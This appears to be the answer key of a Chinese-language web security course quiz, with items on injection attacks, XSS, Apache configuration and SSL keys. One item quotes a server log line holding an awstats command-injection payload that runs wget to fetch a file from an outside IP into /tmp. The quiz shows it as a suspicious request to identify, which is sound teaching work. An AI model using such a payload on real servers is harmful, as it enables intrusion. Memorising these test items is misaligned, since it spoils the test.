標準答案 |
1. 安裝了最新系統修補程式,我的網頁應用程式(知名網頁討論版PHPBB)也都是最新版的,應不致有安全上的疑慮了。 X |
2. IDS/IPS可偵測本課程所述之所有攻擊行為。 X |
3.下列何者並非網站應用系統技術之一? 1. PHP 2. VB.Net 3. Assembly 4. Java |
4.下列敘述何者錯誤? 1.網站應用系統一般使用Port 80來傳輸 2. IIS是網站伺服器軟體 3. Apache只能在Unix上安裝 4. PHP可以製作動態網頁 |
5.請檢視自下列網站伺服器紀錄,指出何為可疑的http要求? 1. 10.2.3.4 - - [26/Jan/2006:09:43:40 -0700] 2. 68.124.193.166 - - [09/Nov/2005:07:56:40 +0800] GET cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2011%2e22%2e33%2e44%2flisten%3b 3. 12.3.3.4 - - [26/Jan/2006:09:43:37 -0700] 4. 192.168.114.201 |
6.下列敘述何者錯誤? 1.存放網頁應用程式的系統安裝最新系統修補程式後,便不會存有弱點。 2.跨站指令碼不但影響伺服主機,甚至會導致瀏覽者受害。 3. SQL injection是一種攻擊網站資料庫的手法。 4.跨目錄存取是因為程式撰寫不良。 |
7.下列何者攻擊無法藉由過濾輸入參數來防禦? 1. Directory listing 2. SQL injection 3. Cross site scripting 4. Command injection |
8.請指出下列何者不是本程式碼之問題所在? 1. 未過濾變數page 2. 使用include 3. if沒有接else 4. 這會造成跨目錄存取問題 |
9.Cross-site scripting 攻擊無法達到下列何種行為? 1.強迫瀏覽者轉址 2.取得網站伺服器控制權 3.偷取瀏覽者cookie 4.騙取瀏覽者輸入資料 |
10.下列何者為非? 1.指令插入弱點甚至會被撰寫成worm進行散播,awstats便是一例。 2. Cross-site scripting 也有可能遭利用,撰寫為worm。 3. SQL injection 最有名的worm就是SQL Slammer 4. Cookie值應該要編碼 |
11.Apache設定檔可以透過下列那個語法,將其它分散的設定檔納入? 1. Source 2. Link 3. Insert 4. Include |
12.在Apache設定語法中,若一個Directive的開始標籤式是,請問其結束標籤如何表示? 1. 2. <#ABC> 3. 4. |
13.請問WWW預設的Port是幾號? 1. TCP/8000 2. TCP/8080 3. TCP/800 4. TCP/80 |
14.在SSL加密流程中,以下那種KEY在網路上被加密傳遞? 1. secret key 2. public key 3. private key 4. server key |
15.以下關於CA角色的敘述,何者是正確的? 1. 產生KEY的機構 2. 儲存KEY的機構 3. 散佈KEY的機構 4. 背書證明內容與key的機構 |
16.請問驗證證書真偽的方法是甚麼? 1. 需要CA的公鑰驗 2. 需要CA的公私鑰 3. 自動信任 4. 無法驗證 |
17.請問Apache所用的Server Key存放目錄是以下那一個? 1. /etc/apache2 2. /etc/apache2/ssl.crt 3. /etc/apache2/ssl.key 4. /etc/apache2/ssl.csr |
18.在SSL加密流程中,以下那種KEY用來解密別的被加密傳遞的KEY? 1. secret key 2. public key 3. private key 4. server key |
19.在預設的Apache配置下,以下那些目錄會存放在Server Root之下? 1. htdocs 2. conf 3. logs 4. modules |
20.在預設的Apache配置下,以下那些目錄會存放在Document Root之下? 1. htdocs 2. cgi-bin 3. icons 4. modules |
留言列表